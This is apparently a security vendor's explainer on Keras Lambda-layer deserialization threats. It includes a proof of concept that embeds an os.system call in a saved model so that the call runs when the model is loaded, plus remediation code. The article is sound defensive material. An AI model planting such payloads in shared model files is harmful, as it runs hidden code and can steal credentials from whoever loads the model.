Understanding Model Threats

This resource is designed to provide detailed information on various threat categories, helping you understand and mitigate potential risks in AI and machine learning systems.

Deserialization Threats

Deserialization threats occur when untrusted data or code is used to reconstruct objects, leading to potential exploitation. In AI and machine learning systems, this can result in malicious actors injecting harmful code during the deserialization process, exploiting vulnerabilities to gain unauthorized access or manipulate your system's behavior. Understanding deserialization threats is crucial for securing data integrity and preventing unauthorized code execution in your AI models.

Overview

Deserialization threats in AI and machine learning systems pose significant security risks, particularly when using Keras models with Lambda layers. This article outlines the specific threat posed by Lambda layers at model load time, its potential impact, and actionable steps to mitigate the risk.

Models flagged for this threat meet the following criteria:

  1. The model is developed using Keras - a popular machine learning framework.
  2. The model contains a Lambda layer, which will execute code when the model is loaded.
  3. No malicious code was found in the Lambda layer.

Keras is an open-source deep learning library for developing machine learning models. It provides a high-level API that works seamlessly with other machine learning libraries such as TensorFlow.

A Lambda layer in Keras is a special kind of layer that allows custom operations or transformations on data within a neural network. Keras provides predefined layers such as Dense (for fully connected layers) or Conv2D (for convolutional layers), but a Lambda layer is used when a unique transformation or calculation isn't available in the standard layers.
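
As an illustration, here is a minimal sketch of a legitimate Lambda layer; the architecture and the clipping transformation are arbitrary choices for the example, not taken from any flagged model.

  import tensorflow as tf
  from tensorflow import keras
  from tensorflow.keras import layers

  model = keras.Sequential([
      keras.Input(shape=(4,)),
      layers.Dense(8, activation="relu"),
      # Custom transformation not offered by a built-in layer:
      # scale activations and clip them to a fixed range.
      layers.Lambda(lambda x: tf.clip_by_value(x * 2.0, 0.0, 1.0)),
      layers.Dense(1, activation="sigmoid"),
  ])
  model.summary()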

Though a Lambda layer gives you the flexibility to customize operations within a neural network, it also allows arbitrary code execution. An attacker can exploit this by embedding malicious code in the Lambda layer of a Keras model.

Key Points:

  1. Keras is a high-level API for developing machine learning models.
  2. Keras Lambda layers allow for arbitrary code execution.
  3. Attackers can inject malicious code into a Keras Lambda layer.
  4. Loading a compromised Keras model will execute the malicious code.
  5. Only load models from trusted sources.

Background Information

Further reading:

  1. Keras Lambda layer

Impact

This model was not found to contain any malicious code within its layers at this time. However, remote calls can still create an attack surface for exploitation and should be avoided.

An attacker could exploit a compromised model to:

  1. Access sensitive information (e.g., SSH keys, cloud credentials)
  2. Execute malicious code on your system
  3. Use the compromised system as a vector for broader attacks

Note: Malicious code execution using a Lambda layer can be achieved without impacting a model's performance; the user may never know that an attack has happened or is ongoing.

How The Attack Works:
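
The sketch below illustrates the general attack path. It assumes a recent tf.keras or Keras 3 installation, and the file name and echo command are stand-ins for a real payload.

  from tensorflow import keras
  from tensorflow.keras import layers

  # Attacker side: embed arbitrary Python in a Lambda layer. Because the
  # function is a Python lambda, Keras serializes its bytecode into the
  # model file. A real payload could read SSH keys or cloud credentials
  # instead of echoing a message.
  model = keras.Sequential([
      keras.Input(shape=(4,)),
      layers.Lambda(
          lambda x: (__import__("os").system("echo 'payload executed'"), x)[1]
      ),
      layers.Dense(1),
  ])
  model.save("innocuous_model.keras")

  # Victim side: merely loading the model runs the embedded code, because
  # rebuilding the model graph calls the Lambda function before any
  # prediction is made. Keras 3 refuses to do this unless safe_mode is
  # explicitly disabled; older tf.keras versions deserialize the lambda
  # without asking.
  keras.models.load_model("innocuous_model.keras", safe_mode=False)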

Remediation

If possible, avoid using Keras models with Lambda layers, since a Lambda layer allows arbitrary code execution that can be exploited by an attacker.
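
If you must load third-party Keras models, one additional safeguard is to keep safe mode enabled so that models carrying serialized Python lambdas are rejected rather than executed. This is a hedged sketch assuming Keras 3 or tf.keras 2.13+, where load_model accepts a safe_mode argument; the file name is illustrative.

  from tensorflow import keras

  try:
      # safe_mode=True (the default in current Keras releases) refuses to
      # deserialize Python lambdas, so a model carrying a Lambda-layer
      # payload fails to load instead of silently executing code.
      model = keras.models.load_model("downloaded_model.keras", safe_mode=True)
  except ValueError as err:
      print(f"Model rejected due to unsafe deserialization: {err}")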

Protect AI's security scanner detects threats in model files
With Protect AI's Guardian you can scan models for threats before ML developers download them for use, and apply policies based on your risk tolerance.
Learn more